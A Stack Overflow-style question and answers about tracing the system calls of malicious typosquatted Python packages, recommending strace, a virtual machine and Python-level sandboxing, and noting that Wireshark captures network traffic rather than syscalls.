-2

I want to capture syscalls of malicious python packages. Is there any way to do this? Or can I capture syscalls in wireshark?

For reference: Typosquatted Python packages, much like StackOverlow copy/paste.

artless noise
  • 21,212
  • 6
  • 68
  • 105
Awaiz Khan
  • 29
  • 3

1 Answers1

2

  1. Wireshark does not trace syscalls, it traces the network traffic, two completely different thingsnote

  2. Why are you even importing and/or installing such packages

  3. You can use strace on any */Linux distribution

    3.1. Though strace output is often hard to read, you're better off reading the src

  4. Use a virtual machine, just in case you know

Note: Wireshark can trace USB as well as network traffic.

This is unlikely to solve your problem as read() is a function. If it reads /etc/passwd, it is different than /etc/python/debian_config. You would have to examine the arguments to the syscall.

artless noise
  • 21,212
  • 6
  • 68
  • 105
Ari157
  • 95
  • 4
  • 16
  • Hey, I want to capture the syscalls of a malicious python package which proceed in a software supply chain attack. Can you tell me how can I strace any package? Thanks – Awaiz Khan Aug 19 '22 at 11:09
  • @AwaizKhan Read the `strace` command manual, it's very easy. But you won't get very far by tracing system calls (unless the python package is using mostly C code). Python is too high-level. I would investigate some debugging/sandbox solution specific to python (you can monkey-patch almost anything in python). – Margaret Bloom Aug 19 '22 at 12:21
  • @AwaizKhan `strace python3 ....` – Ari157 Aug 19 '22 at 14:03